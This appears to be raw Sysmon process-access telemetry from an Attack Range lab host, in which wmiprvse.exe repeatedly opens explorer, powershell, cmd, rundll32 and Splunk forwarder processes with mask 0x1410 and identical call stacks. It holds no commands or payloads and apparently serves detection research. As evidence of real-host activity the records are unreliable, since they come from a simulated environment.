16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.173{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.173{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 